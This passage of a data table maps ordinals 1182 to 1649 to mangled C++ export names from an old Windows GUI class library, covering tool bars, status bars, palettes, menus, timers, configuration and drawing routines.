1182: b'?Next@ToolItemList@@QAEPAUToolItem@@XZ',
1183: b'?Paint@ToolBox@@UAEXABVRectangle@@@Z',
1184: b'?Remove@ToolItemList@@QAEPAUToolItem@@K@Z',
1185: b'?RemoveItem@ToolBox@@QAEXG@Z',
1186: b'?RequestHelp@ToolBox@@UAEXABVHelpEvent@@@Z',
1187: b'?Resize@ToolBox@@UAEXXZ',
1188: b'?Select@ToolBox@@UAEXXZ',
1189: b'?SetHelpText@ToolBox@@QAEXGABVString@@@Z',
1190: b'?SetItemBitmap@ToolBox@@QAEXGABVBitmap@@@Z',
1191: b'?SetItemDisableBitmap@ToolBox@@QAEXGABVBitmap@@@Z',
1192: b'?SetItemText@ToolBox@@QAEXGABVString@@@Z',
1193: b'?Show@ToolBox@@QAEXXZ',
1194: b'??0StatusBar@@QAE@PAVWindow@@ABVResId@@@Z',
1195: b'??0StatusBar@@QAE@PAVWindow@@G@Z',
1196: b'??0StatusItem@@QAE@ABU0@@Z',
1197: b'??0StatusItem@@QAE@XZ',
1198: b'??0StatusItemList@@QAE@GG@Z',
1199: b'??1StatusBar@@UAE@XZ',
1200: b'??1StatusItem@@QAE@XZ',
1201: b'??1StatusItemList@@QAE@XZ',
1202: b'??BString@@QBGPBDXZ',
1203: b'??_7StatusBar@@6B@',
1204: b'??_GStatusBar@@UAEPAXI@Z',
1205: b'??_GStatusItem@@QAEPAXI@Z',
1206: b'??_GStatusItemList@@QAEPAXI@Z',
1207: b'?ChangeAlign@StatusBar@@QAE?AW4StatusBarAlign@@W42@@Z',
1208: b'?Clear@StatusBar@@QAEXXZ',
1209: b'?Clear@StatusItemList@@QAEXXZ',
1210: b'?Click@StatusBar@@UAEXXZ',
1211: b'?CopyItems@StatusBar@@QAEXABV1@@Z',
1212: b'?Count@StatusItemList@@QBEKXZ',
1213: b'?DoubleClick@StatusBar@@UAEXXZ',
1214: b'?First@StatusItemList@@QAEPAUStatusItem@@XZ',
1215: b'?GetCurPos@StatusItemList@@QBEKXZ',
1216: b'?GetItemCount@StatusBar@@QBEGXZ',
1217: b'?GetItemId@StatusBar@@QBEGG@Z',
1218: b'?GetItemPos@StatusBar@@QBEGG@Z',
1219: b'?GetItemRect@StatusBar@@QBE?AVRectangle@@G@Z',
1220: b'?GetItemText@StatusBar@@QBE?AVString@@G@Z',
1221: b'?GetObject@StatusItemList@@QBEPAUStatusItem@@K@Z',
1222: b'?HideItems@StatusBar@@QAEXXZ',
1223: b'?Insert@StatusItemList@@QAEXPAUStatusItem@@K@Z',
1224: b'?InsertItem@StatusBar@@QAEEGGW4StatusItemAlign@@GG@Z',
1225: b'?MouseButtonDown@StatusBar@@UAEXABVMouseEvent@@@Z',
1226: b'?Next@StatusItemList@@QAEPAUStatusItem@@XZ',
1227: b'?Paint@StatusBar@@UAEXABVRectangle@@@Z',
1228: b'?Remove@StatusItemList@@QAEPAUStatusItem@@K@Z',
1229: b'?RemoveItem@StatusBar@@QAEXG@Z',
1230: b'?Resize@StatusBar@@UAEXXZ',
1231: b'?SetItemText@StatusBar@@QAEXGABVString@@@Z',
1232: b'?SetText@StatusBar@@QAEXABVString@@@Z',
1233: b'?ShowItems@StatusBar@@QAEXXZ',
1234: b'??0Palette@@QAE@ABV0@@Z',
1235: b'??0Palette@@QAE@G@Z',
1236: b'??0Palette@@QAE@GQAVColor@@E@Z',
1237: b'??1PalColor@@QAE@XZ',
1238: b'??1Palette@@QAE@XZ',
1239: b'??4Palette@@QAEAAV0@ABV0@@Z',
1240: b'??8Palette@@QBEEABV0@@Z',
1241: b'??9Palette@@QBEEABV0@@Z',
1242: b'??APalette@@QAEAAVColor@@G@Z',
1243: b'??APalette@@QBE?AVColor@@G@Z',
1244: b'??_GPalColor@@QAEPAXI@Z',
1245: b'?ChangeAnimate@Palette@@QAEEGE@Z',
1246: b'?ChangeColor@Palette@@QAE?AVColor@@GABV2@@Z',
1247: b'?ChangeEntryCount@Palette@@QAEGG@Z',
1248: b'?GetColor@Palette@@QBE?AVColor@@G@Z',
1249: b'?GetEntryCount@Palette@@QBEGXZ',
1250: b'?IsAnimate@Palette@@QBEEG@Z',
1251: b'?SetAnimate@Palette@@QAEXE@Z',
1252: b'?SetSVData@@YGXPAUSVDATA@@@Z',
1253: b'??0OutDevList@@QAE@GG@Z',
1254: b'??0UniqueId@@QAE@G@Z',
1255: b'??1FloatWinList@@QAE@XZ',
1256: b'??1OutDevList@@QAE@XZ',
1257: b'??1PalWindowList@@QAE@XZ',
1258: b'??1PopupList@@QAE@XZ',
1259: b'??1PrnTable@@QAE@XZ',
1260: b'??1UniqueId@@QAE@XZ',
1261: b'??1UniqueIndex@@QAE@XZ',
1262: b'??_GFloatWinList@@QAEPAXI@Z',
1263: b'??_GFont@@QAEPAXI@Z',
1264: b'??_GInternational@@QAEPAXI@Z',
1265: b'??_GOutDevList@@QAEPAXI@Z',
1266: b'??_GPalWindowList@@QAEPAXI@Z',
1267: b'??_GPopupList@@QAEPAXI@Z',
1268: b'??_GPrnTable@@QAEPAXI@Z',
1269: b'??_GResMgr@@QAEPAXI@Z',
1270: b'??_GStarObjectMgr@@QAEPAXI@Z',
1271: b'??_GString@@QAEPAXI@Z',
1272: b'??_GUniqueId@@QAEPAXI@Z',
1273: b'?DeInitSV@@YGXXZ',
1274: b'?InitSV@@YGEXZ',
1275: b'?GetWindowPtr@@YGPAVWindow@@PAUHWND__@@@Z',
1276: b'?GetWindowStyle@@YGKPAUHWND__@@@Z',
1277: b'?HideDropDown@@YGXXZ',
1278: b'?NextDialogControl@@YGXPAUHWND__@@0H@Z',
1279: b'?SetWindowPtr@@YGXPAUHWND__@@PAVWindow@@@Z',
1280: b'?TimerProc@@YGXPAUHWND__@@IIK@Z',
1281: b'?WndProc@@YGJPAUHWND__@@IIJ@Z',
1282: b'?GetActiveMDIWindow@@YGPAUHWND__@@PAU1@@Z',
1283: b'?MDIChildWndProc@@YGJPAUHWND__@@IIJ@Z',
1284: b'?MDIFrameWndProc@@YGJPAUHWND__@@IIJ@Z',
1285: b'?ComboBoxEdit@@YGJPAUHWND__@@IIJ@Z',
1286: b'?ControlProc@@YGJPAUHWND__@@IIJ@Z',
1287: b'?DlgProc@@YGHPAUHWND__@@IIJ@Z',
1288: b'?GetIdObject@UniqueId@@QBEPAVWindow@@G@Z',
1289: b'?GetWindowId@@YGIPAUHWND__@@@Z',
1290: b'?SelectFont@@YGPAUHFONT__@@PAUHDC__@@PAU1@@Z',
1291: b'?SetWindowStyle@@YGXPAUHWND__@@K@Z',
1292: b'?DeleteBrush@@YGXPAUHBRUSH__@@@Z',
1293: b'?DeleteFont@@YGXPAUHFONT__@@@Z',
1294: b'?DeletePen@@YGXPAUHPEN__@@@Z',
1295: b'?First@FloatWinList@@QAEPAVFloatingWindow@@XZ',
1296: b'?FloatWindowProc@@YGEPAVFloatingWindow@@PAUHWND__@@IIJAAJ@Z',
1297: b'?Next@FloatWinList@@QAEPAVFloatingWindow@@XZ',
1298: b'?SelectBrush@@YGPAUHBRUSH__@@PAUHDC__@@PAU1@@Z',
1299: b'?SelectPen@@YGPAUHPEN__@@PAUHDC__@@PAU1@@Z',
1300: b'??0HelpEvent@@QAE@ABVPoint@@W4HelpMode@@@Z',
1301: b'??0KeyCode@@QAE@GEEE@Z',
1302: b'??0KeyEvent@@QAE@DABVKeyCode@@G@Z',
1303: b'??0MouseEvent@@QAE@XZ',
1304: b'?ColorToWin@@YGKABVColor@@@Z',
1305: b'?DeleteBitmap@@YGXPAUHBITMAP__@@@Z',
1306: b'?First@PalWindowList@@QAEPAVWindow@@XZ',
1307: b'?GetClassIcon@@YGPAUHICON__@@PAUHWND__@@@Z',
1308: b'?GetEditSelection@@YGXPAUHWND__@@AAK1@Z',
1309: b'?GetMenuSelectMsgFlags@@YGIIJ@Z',
1310: b'?GetMenuSelectMsgId@@YGIIJ@Z',
1311: b'?GetMenuSelectMsgMenu@@YGPAUHMENU__@@IJ@Z',
1312: b'?GetMenuSelectMsgPopupMenu@@YGPAUHMENU__@@IJ@Z',
1313: b'?GetPos@PalWindowList@@QBEKPAVWindow@@@Z',
1314: b'?GetStyle@Brush@@QBE?AW4BrushStyle@@XZ',
1315: b'?IsTransparent@Font@@QBEEXZ',
1316: b'?IsVisible@Cursor@@QBEEXZ',
1317: b'?Max@Range@@QAEAAFXZ',
1318: b'?MessageHook@@YGJHIJ@Z',
1319: b'?Min@Range@@QAEAAFXZ',
1320: b'?Next@PalWindowList@@QAEPAVWindow@@XZ',
1321: b'?SelectBitmap@@YGPAUHBITMAP__@@PAUHDC__@@PAU1@@Z',
1322: b'?SetClassBrush@@YGPAUHBRUSH__@@PAUHWND__@@PAU1@@Z',
1323: b'?SetClassIcon@@YGXPAUHWND__@@PAUHICON__@@@Z',
1324: b'?Top@Stack@@QBEPAXXZ',
1325: b'??1ApplicationEvent@@QAE@XZ',
1326: b'??4DropEvent@@QAEAAV0@ABV0@@Z',
1327: b'??YPoint@@QAEAAV0@ABV0@@Z',
1328: b'??ZPoint@@QAEAAV0@ABV0@@Z',
1329: b'?ChangeRequestHdl@Exchange@@QAE?AVLink@@ABV2@@Z',
1330: b'?DropMsg@@YGJPAVWindow@@PAUHWND__@@IIJ@Z',
1331: b'?First@OutDevList@@QAEPAVOutputDevice@@XZ',
1332: b'?GetSymbol@SymbolButton@@QBE?AW4SymbolType@@XZ',
1333: b'?GetWindowInstance@@YGPAUHINSTANCE__@@PAUHWND__@@@Z',
1334: b'?Next@OutDevList@@QAEPAVOutputDevice@@XZ',
1335: b'?CbtFilterHook@@YGJHIJ@Z',
1336: b'?First@SVLookList@@QAEPAVWindow@@XZ',
1337: b'?GetWindowProc@@YGP6GJPAUHWND__@@IIJ@Z0@Z',
1338: b'?GrayBkDlgProc@@YGJPAUHWND__@@IIJ@Z',
1339: b'?GrayButtonProc@@YGJPAUHWND__@@IIJ@Z',
1340: b'?GrayDrawTextProc@@YGHPAUHDC__@@JH@Z',
1341: b'?GrayFixedProc@@YGJPAUHWND__@@IIJ@Z',
1342: b'?Next@SVLookList@@QAEPAVWindow@@XZ',
1343: b'?SubclassWindow@@YGP6GJPAUHWND__@@IIJ@Z0P6GJ0IIJ@Z@Z',
1344: b'??_GApplicationEvent@@QAEPAXI@Z',
1345: b'?AnyInput@Application@@QAEEG@Z',
1346: b'?ChangeAppFont@Application@@QAE?AVFont@@ABV2@@Z',
1347: b'?ChangeAppInternational@Application@@QAE?AVInternational@@ABV2@@Z',
1348: b'?ChangeAppMenu@Application@@QAEPAVMenuBar@@PAV2@@Z',
1349: b'?ChangeAppName@Application@@QAE?AVString@@ABV2@@Z',
1350: b'?ChangeHelp@Application@@QAEPAVHelp@@PAV2@@Z',
1351: b'?DisableHelp@Application@@QAEXW4HelpMode@@@Z',
1352: b'?DisableSVLook@Application@@QAEXXZ',
1353: b'?EnableHelp@Application@@QAEXW4HelpMode@@@Z',
1354: b'?EnableSVLook@Application@@QAEXXZ',
1355: b'?Execute@Application@@QAEXXZ',
1356: b'?GetAppFileName@Application@@QBE?AVString@@XZ',
1357: b'?GetAppFont@Application@@QBE?AVFont@@XZ',
1358: b'?GetAppInternational@Application@@QBE?AVInternational@@XZ',
1359: b'?GetAppMenu@Application@@QBEPAVMenuBar@@XZ',
1360: b'?GetAppName@Application@@QBE?AVString@@XZ',
1361: b'?GetAppWindow@Application@@QBEPAVWorkWindow@@XZ',
1362: b'?GetHelp@Application@@QBEPAVHelp@@XZ',
1363: b'?GetSize@Font@@QBEABVSize@@XZ',
1364: b'?GetpApp@@YGPAVApplication@@XZ',
1365: b'?IsActive@Timer@@QBEEXZ',
1366: b'?IsHelpEnabled@Application@@QBEEW4HelpMode@@@Z',
1367: b'?IsSVLookEnabled@Application@@QBEEXZ',
1368: b'?Quit@Application@@QAEXXZ',
1369: b'?Reschedule@Application@@QAEXXZ',
1370: b'?SetMDIMenu@@YGXPAUHWND__@@PAUHMENU__@@1@Z',
1371: b'??7String@@QBEEXZ',
1372: b'?Abort@Application@@QAEXABVString@@@Z',
1373: b'?ActivateExtHelp@Application@@UAEXXZ',
1374: b'?AppEvent@Application@@UAEXABVApplicationEvent@@@Z',
1375: b'?DeactivateExtHelp@Application@@UAEXXZ',
1376: b'?DisableMenuAccel@Application@@QAEXXZ',
1377: b'?DispatchAppEvents@Application@@QAEGHQAPAD@Z',
1378: b'?EnableMenuAccel@Application@@QAEXXZ',
1379: b'?Exception@Application@@UAEXF@Z',
1380: b'?FlushAccel@Application@@QAEXXZ',
1381: b'?InitAppRes@Application@@QAEXABVResId@@@Z',
1382: b'?InsertAccel@Application@@QAEEPAVAccelerator@@W4AccelType@@@Z',
1383: b'?InsertIdleHdl@Application@@QAEEABVLink@@G@Z',
1384: b'?IsInExecute@Application@@QBEEXZ',
1385: b'?IsInMain@Application@@QBEEXZ',
1386: b'?IsInModalMode@Application@@QBEEXZ',
1387: b'?IsMenuAccelEnabled@Application@@QBEEXZ',
1388: b'?IsWait@Application@@QBEEXZ',
1389: b'?PostAppEvent@Application@@QAEEABVString@@000@Z',
1390: b'?PostUserEvent@Application@@QAEXKPAX@Z',
1391: b'?QueryExit@Application@@UAEEXZ',
1392: b'?RemoveAccel@Application@@QAEXPAVAccelerator@@@Z',
1393: b'?RemoveIdleHdl@Application@@QAEXABVLink@@@Z',
1394: b'?SysChange@Application@@UAEXW4SysChangeType@@@Z',
1395: b'?UserEvent@Application@@UAEXKPAX@Z',
1396: b'?Wait@Application@@QAEXE@Z',
1397: b'?ActivateMDIWindow@@YGXPAUHWND__@@0@Z',
1398: b'?ActivateNextWindow@MDIApplication@@QAEPAVMDIWindow@@XZ',
1399: b'?Arrange@MDIApplication@@QAEXXZ',
1400: b'?Cascade@MDIApplication@@QAEXXZ',
1401: b'?ChangeActiveWindow@MDIApplication@@QAEPAVMDIWindow@@PAV2@@Z',
1402: b'?ChangeMDIMenu@MDIApplication@@QAEPAVPopupMenu@@PAV2@@Z',
1403: b'?CloseAll@MDIApplication@@QAEEXZ',
1404: b'?GetActiveWindow@MDIApplication@@QBEPAVMDIWindow@@XZ',
1405: b'?GetMDIMenu@MDIApplication@@QBEPAVPopupMenu@@XZ',
1406: b'?GetVisibleWindowCount@MDIApplication@@QBEGXZ',
1407: b'?GetWindowCount@MDIApplication@@QBEGXZ',
1408: b'?Horizontal@MDIApplication@@QAEXXZ',
1409: b'?IsMDIWindowMaximized@@YGEPAUHWND__@@@Z',
1410: b'?Tile@MDIApplication@@QAEXXZ',
1411: b'?Vertical@MDIApplication@@QAEXXZ',
1412: b'??0PrnList@@QAE@GG@Z',
1413: b'??1PrnList@@QAE@XZ',
1414: b'??_GPrnList@@QAEPAXI@Z',
1415: b'?Count@PrnList@@QBEKXZ',
1416: b'?First@PrnList@@QAEPAVString@@XZ',
1417: b'?GetCPUType@System@@SG?AW4CPUType@@XZ',
1418: b'?GetDefaultPrinterName@System@@SG?AVString@@XZ',
1419: b'?GetFreeMemory@System@@SGKXZ',
1420: b'?GetGUIType@System@@SG?AW4GUIType@@XZ',
1421: b'?GetGUIVersion@System@@SG?AVString@@XZ',
1422: b'?GetMenuBarHeightPixel@System@@SGGXZ',
1423: b'?GetMouseButtonCount@System@@SGGXZ',
1424: b'?GetObject@PrnList@@QBEPAVString@@K@Z',
1425: b'?GetPrinterCount@System@@SGGXZ',
1426: b'?GetPrinterName@System@@SG?AVString@@G@Z',
1427: b'?GetScreenSizePixel@System@@SG?AVSize@@XZ',
1428: b'?GetSystemFont@System@@SG?AVFont@@XZ',
1429: b'?GetSystemType@System@@SG?AW4SystemType@@XZ',
1430: b'?GetUserName@System@@SG?AVString@@XZ',
1431: b'?HasMouse@System@@SGEXZ',
1432: b'?Insert@PrnList@@QAEXPAVString@@K@Z',
1433: b'?Next@PrnList@@QAEPAVString@@XZ',
1434: b'??0DynArray@@QAE@K@Z',
1435: b'??1DynArray@@QAE@XZ',
1436: b'??_GDynArray@@QAEPAXI@Z',
1437: b'?First@PopupList@@QAEPAVWindow@@XZ',
1438: b'?Get@DynArray@@QBEPAXK@Z',
1439: b'?Next@PopupList@@QAEPAVWindow@@XZ',
1440: b'?Put@DynArray@@QAEPAXKPAX@Z',
1441: b'?ChangeHook@Sysdepen@@SGP6GHPAUHWND__@@IIJAAJ@ZP6GH0IIJ1@Z@Z',
1442: b'?ConvertToSVMetaFile@Sysdepen@@SGXAAVGDIMetaFile@@@Z',
1443: b'?ConvertToSysMetaFile@Sysdepen@@SGXAAVGDIMetaFile@@@Z',
1444: b'?DelUniqueId@UniqueId@@QAEXG@Z',
1445: b'?GetHook@Sysdepen@@SGP6GHPAUHWND__@@IIJAAJ@ZXZ',
1446: b'?GetSVFeatures@Sysdepen@@SGHXZ',
1447: b'?GethBitmap@Sysdepen@@SGPAUHBITMAP__@@ABVBitmap@@@Z',
1448: b'?GethCursor@Sysdepen@@SGPAUHICON__@@ABVPointer@@@Z',
1449: b'?GethDC@Sysdepen@@SGPAUHDC__@@ABVOutputDevice@@@Z',
1450: b'?GethIcon@Sysdepen@@SGPAUHICON__@@ABVIcon@@@Z',
1451: b'?GethInst@Sysdepen@@SGPAUHINSTANCE__@@XZ',
1452: b'?GethMDIClient@Sysdepen@@SGPAUHWND__@@XZ',
1453: b'?GethMenu@Sysdepen@@SGPAUHMENU__@@ABVMenu@@@Z',
1454: b'?GethMetaFile@Sysdepen@@SGPAUHMETAFILE__@@ABVGDIMetaFile@@@Z',
1455: b'?GethPalette@Sysdepen@@SGPAUHPALETTE__@@ABVPalette@@@Z',
1456: b'?GethPrevInst@Sysdepen@@SGPAUHINSTANCE__@@XZ',
1457: b'?GethWnd@Sysdepen@@SGPAUHWND__@@ABVWindow@@@Z',
1458: b'?IsDIB@Sysdepen@@SGHABVBitmap@@@Z',
1459: b'?IsSysMetaFile@Sysdepen@@SGHABVGDIMetaFile@@@Z',
1460: b'?NewUniqueId@UniqueId@@QAEGPAVWindow@@@Z',
1461: b'?SetSVFeatures@Sysdepen@@SGXH@Z',
1462: b'?SetWindowId@@YGXPAUHWND__@@K@Z',
1463: b'?SethBitmap@Sysdepen@@SGXAAVBitmap@@PAUHBITMAP__@@H@Z',
1464: b'?SethCursor@Sysdepen@@SGXAAVPointer@@PAUHICON__@@H@Z',
1465: b'?SethIcon@Sysdepen@@SGXAAVIcon@@PAUHICON__@@H@Z',
1466: b'?SethMetaFile@Sysdepen@@SGXAAVGDIMetaFile@@PAUHMETAFILE__@@@Z',
1467: b'?SethWnd@Sysdepen@@SGXAAVWindow@@PAUHWND__@@@Z',
1468: b'??0Menu@@QAE@ABVResId@@@Z',
1469: b'??0Menu@@QAE@XZ',
1470: b'??0MenuBar@@QAE@ABV0@@Z',
1471: b'??0MenuBar@@QAE@ABVResId@@@Z',
1472: b'??0MenuBar@@QAE@XZ',
1473: b'??0PopupMenu@@QAE@ABV0@@Z',
1474: b'??0PopupMenu@@QAE@ABVResId@@@Z',
1475: b'??0PopupMenu@@QAE@XZ',
1476: b'??1Menu@@UAE@XZ',
1477: b'??1MenuBar@@UAE@XZ',
1478: b'??1PopupMenu@@UAE@XZ',
1479: b'??4Menu@@QAEAAV0@ABV0@@Z',
1480: b'??4MenuBar@@QAEAAV0@ABV0@@Z',
1481: b'??4PopupMenu@@QAEAAV0@ABV0@@Z',
1482: b'??_7Menu@@6B@',
1483: b'??_7MenuBar@@6B@',
1484: b'??_7PopupMenu@@6B@',
1485: b'??_GMenu@@UAEPAXI@Z',
1486: b'??_GMenuBar@@UAEPAXI@Z',
1487: b'??_GPopupMenu@@UAEPAXI@Z',
1488: b'?Activate@Menu@@UAEXXZ',
1489: b'?ChangeAccelKey@Menu@@QAE?AVKeyCode@@GABV2@@Z',
1490: b'?ChangeHelpId@Menu@@QAEKGK@Z',
1491: b'?ChangePopupMenu@Menu@@QAEPAVPopupMenu@@GPAV2@@Z',
1492: b'?CheckItem@Menu@@QAEXGE@Z',
1493: b'?Clear@Menu@@QAEXXZ',
1494: b'?Deactivate@Menu@@UAEXXZ',
1495: b'?DrawAppMenu@@YGXPAVMenu@@@Z',
1496: b'?EnableItem@Menu@@QAEXGE@Z',
1497: b'?Execute@PopupMenu@@QAEGABVPoint@@@Z',
1498: b'?GetAccelKey@Menu@@QBE?AVKeyCode@@G@Z',
1499: b'?GetCurItemId@Menu@@QBEGXZ',
1500: b'?GetHelpId@Menu@@QBEKG@Z',
1501: b'?GetHelpText@Menu@@QBE?AVString@@G@Z',
1502: b'?GetItemBitmap@Menu@@QBE?AVBitmap@@G@Z',
1503: b'?GetItemCount@Menu@@QBEGXZ',
1504: b'?GetItemId@Menu@@QBEGG@Z',
1505: b'?GetItemPos@Menu@@QBEGG@Z',
1506: b'?GetItemText@Menu@@QBE?AVString@@G@Z',
1507: b'?GetItemType@Menu@@QBE?AW4MenuItemType@@G@Z',
1508: b'?GetPopupMenu@Menu@@QBEPAVPopupMenu@@G@Z',
1509: b'?GetPos@Stack@@QBEKPBX@Z',
1510: b'?GetText@PopupMenu@@QBE?AVString@@XZ',
1511: b'?Highlight@Menu@@UAEXXZ',
1512: b'?InitMenu@@YGXPAVMenu@@@Z',
1513: b'?InsertItem@Menu@@QAEEABVResId@@G@Z',
1514: b'?InsertItem@Menu@@QAEEGABVBitmap@@GG@Z',
1515: b'?InsertItem@Menu@@QAEEGABVString@@GG@Z',
1516: b'?InsertSeparator@Menu@@QAEXG@Z',
1517: b'?IsItemChecked@Menu@@QBEEG@Z',
1518: b'?IsItemEnabled@Menu@@QBEEG@Z',
1519: b'?PopActivateHdl@Menu@@QAE?AVLink@@XZ',
1520: b'?PopDeactivateHdl@Menu@@QAE?AVLink@@XZ',
1521: b'?PopHighlightHdl@Menu@@QAE?AVLink@@XZ',
1522: b'?PopSelectHdl@Menu@@QAE?AVLink@@XZ',
1523: b'?PushActivateHdl@Menu@@QAEXABVLink@@@Z',
1524: b'?PushDeactivateHdl@Menu@@QAEXABVLink@@@Z',
1525: b'?PushHighlightHdl@Menu@@QAEXABVLink@@@Z',
1526: b'?PushSelectHdl@Menu@@QAEXABVLink@@@Z',
1527: b'?RemoveItem@Menu@@QAEXG@Z',
1528: b'?RequestHelp@Menu@@UAEXABVHelpEvent@@@Z',
1529: b'?Select@Menu@@UAEXXZ',
1530: b'?SetAutoMenu@@YGXPAVMenu@@GPAVPopupMenu@@@Z',
1531: b'?SetHelpText@Menu@@QAEXGABVString@@@Z',
1532: b'?SetItemBitmap@Menu@@QAEXGABVBitmap@@@Z',
1533: b'?SetItemText@Menu@@QAEXGABVString@@@Z',
1534: b'?SetText@PopupMenu@@QAEXABVString@@@Z',
1535: b'??0MenuAccel@@QAE@XZ',
1536: b'??0MenuItemData@@QAE@XZ',
1537: b'??1MenuAccel@@QAE@XZ',
1538: b'??1MenuItemData@@QAE@XZ',
1539: b'??8KeyCode@@QBEEABV0@@Z',
1540: b'??_GMenuAccel@@QAEPAXI@Z',
1541: b'??_GMenuItemData@@QAEPAXI@Z',
1542: b'??0AutoTimer@@QAE@ABV0@@Z',
1543: b'??0AutoTimer@@QAE@XZ',
1544: b'??0Timer@@QAE@ABV0@@Z',
1545: b'??0Timer@@QAE@XZ',
1546: b'??1Timer@@QAE@XZ',
1547: b'??4Timer@@QAEAAV0@ABV0@@Z',
1548: b'??_7AutoTimer@@6B@',
1549: b'??_7Timer@@6B@',
1550: b'?ChangeTimeout@Timer@@QAEKK@Z',
1551: b'?Start@Timer@@QAEXXZ',
1552: b'?Stop@Timer@@QAEXXZ',
1553: b'?Timeout@Timer@@UAEXXZ',
1554: b'??0IDLEDATA@@QAE@XZ',
1555: b'??0IdleList@@QAE@GGG@Z',
1556: b'??1IdleList@@QAE@XZ',
1557: b'??_GIdleList@@QAEPAXI@Z',
1558: b'?Count@IdleList@@QBEKXZ',
1559: b'?First@IdleList@@QAEPAUIDLEDATA@@XZ',
1560: b'?GetCurPos@IdleList@@QBEKXZ',
1561: b'?Insert@IdleList@@QAEXPAUIDLEDATA@@K@Z',
1562: b'?Next@IdleList@@QAEPAUIDLEDATA@@XZ',
1563: b'?Remove@IdleList@@QAEPAUIDLEDATA@@XZ',
1564: b'?Remove@List@@QAEPAXXZ',
1565: b'?Seek@IdleList@@QAEPAUIDLEDATA@@K@Z',
1566: b'?Seek@List@@QAEPAXK@Z',
1567: b'??0TimerDataList@@QAE@GGG@Z',
1568: b'??1TimerDataList@@QAE@XZ',
1569: b'??_GTimerDataList@@QAEPAXI@Z',
1570: b'?Count@TimerDataList@@QBEKXZ',
1571: b'?First@TimerDataList@@QAEPAUTIMERDATA@@XZ',
1572: b'?GetCurObject@List@@QBEPAXXZ',
1573: b'?GetCurObject@TimerDataList@@QBEPAUTIMERDATA@@XZ',
1574: b'?Insert@TimerDataList@@QAEXPAUTIMERDATA@@K@Z',
1575: b'?Next@TimerDataList@@QAEPAUTIMERDATA@@XZ',
1576: b'?Remove@TimerDataList@@QAEPAUTIMERDATA@@XZ',
1577: b'??0Help@@QAE@XZ',
1578: b'?DisableBalloonMode@Help@@SGEXZ',
1579: b'?EnableBalloonMode@Help@@SGEXZ',
1580: b'?GetHelpFile@Help@@QBE?AVString@@XZ',
1581: b'?IsBalloonModeEnabled@Help@@SGEXZ',
1582: b'?SetHelpFile@Help@@QAEXABVString@@@Z',
1583: b'?ShowBalloon@Help@@SGEABVPoint@@ABVRectangle@@ABVString@@@Z',
1584: b'?ShowBalloon@Help@@SGEABVPoint@@ABVString@@@Z',
1585: b'?Start@Help@@QAEEABVString@@@Z',
1586: b'?Start@Help@@QAEEK@Z',
1587: b'?Beep@Sound@@SGXW4SoundType@@@Z',
1588: b'??0KeyCode@@QAE@ABVResId@@@Z',
1589: b'??0KeyCode@@QAE@W4KeyFuncType@@@Z',
1590: b'?GetFunction@KeyCode@@QBE?AW4KeyFuncType@@XZ',
1591: b'?GetName@KeyCode@@QBE?AVString@@XZ',
1592: b'??0Config@@QAE@ABV0@@Z',
1593: b'??0Config@@QAE@ABVString@@@Z',
1594: b'??0Config@@QAE@XZ',
1595: b'??0ConfigData@@QAE@ABV0@@Z',
1596: b'??0ConfigData@@QAE@ABVString@@@Z',
1597: b'??1Config@@QAE@XZ',
1598: b'??1ConfigData@@QAE@XZ',
1599: b'??4Config@@QAEAAV0@ABV0@@Z',
1600: b'??8Config@@QBEEABV0@@Z',
1601: b'??9Config@@QBEEABV0@@Z',
1602: b'??_GConfigData@@QAEPAXI@Z',
1603: b'?DeleteGroup@Config@@QAEXABVString@@@Z',
1604: b'?DeleteKey@Config@@QAEXABVString@@@Z',
1605: b'?GetGroup@Config@@QBE?AVString@@XZ',
1606: b'?GetKeyCount@Config@@QBEGXZ',
1607: b'?GetKeyName@Config@@QBE?AVString@@G@Z',
1608: b'?GetPathName@Config@@QBE?AVString@@XZ',
1609: b'?ReadKey@Config@@QBE?AVString@@ABV2@0@Z',
1610: b'?ReadKey@Config@@QBE?AVString@@ABV2@@Z',
1611: b'?ReadKey@Config@@QBE?AVString@@G@Z',
1612: b'?SetGroup@Config@@QAEXABVString@@@Z',
1613: b'?WriteKey@Config@@QAEXABVString@@0@Z',
1614: b'??0OutputDevice@@QAE@ABVResId@@@Z',
1615: b'??0OutputDevice@@QAE@XZ',
1616: b'??1OutputDevice@@UAE@XZ',
1617: b'??_7OutputDevice@@6B@',
1618: b'??_GOutputDevice@@UAEPAXI@Z',
1619: b'?ChangeBackgroundBrush@OutputDevice@@QAE?AVBrush@@ABV2@@Z',
1620: b'?ChangeFillInBrush@OutputDevice@@QAE?AVBrush@@ABV2@@Z',
1621: b'?ChangeFont@OutputDevice@@QAE?AVFont@@ABV2@@Z',
1622: b'?ChangePen@OutputDevice@@QAE?AVPen@@ABV2@@Z',
1623: b'?ChangeRasterOp@OutputDevice@@QAE?AW4RasterOp@@W42@@Z',
1624: b'?DrawLine@OutputDevice@@QAEXABVPoint@@0@Z',
1625: b'?DrawPixel@OutputDevice@@QAEXABVPoint@@ABVColor@@@Z',
1626: b'?DrawPoint@OutputDevice@@QAEXABVPoint@@@Z',
1627: b'?DrawRect@OutputDevice@@QAEXABVRectangle@@GG@Z',
1628: b'?GetAlign@Font@@QBE?AW4FontAlign@@XZ',
1629: b'?GetStyle@Pen@@QBE?AW4PenStyle@@XZ',
1630: b'?GetWidth@Pen@@QBEGXZ',
1631: b'?HighlightRect@OutputDevice@@QAEXABVRectangle@@@Z',
1632: b'?InvertRect@OutputDevice@@QAEXABVRectangle@@@Z',
1633: b'?Remove@OutDevList@@QAEPAVOutputDevice@@PAV2@@Z',
1634: b'?Remove@PalWindowList@@QAEPAVWindow@@PAV2@@Z',
1635: b'?SetWindowFont@@YGXPAUHWND__@@PAUHFONT__@@H@Z',
1636: b'??0EnvStack@@QAE@GG@Z',
1637: b'??0StackEntry@@QAE@XZ',
1638: b'??1EnvStack@@QAE@XZ',
1639: b'??1StackEntry@@QAE@XZ',
1640: b'??_GEnvStack@@QAEPAXI@Z',
1641: b'??_GStackEntry@@QAEPAXI@Z',
1642: b'?ChangeClipRegion@OutputDevice@@QAE?AVRegion@@ABV2@@Z',
1643: b'?ChangeClipRegion@OutputDevice@@QAE?AVRegion@@XZ',
1644: b'?ColorToSV@@YG?AVColor@@K@Z',
1645: b'?Count@EnvStack@@QBEKXZ',
1646: b'?DrawBitmap@OutputDevice@@QAEXABVPoint@@ABVBitmap@@@Z',
1647: b'?DrawBitmap@OutputDevice@@QAEXABVPoint@@ABVSize@@ABVBitmap@@@Z',
1648: b'?DrawIcon@OutputDevice@@QAEXABVPoint@@ABVIcon@@@Z',
1649: b'?DrawOutDev@OutputDevice@@QAEXABVPoint@@ABVSize@@01ABV1@@Z',
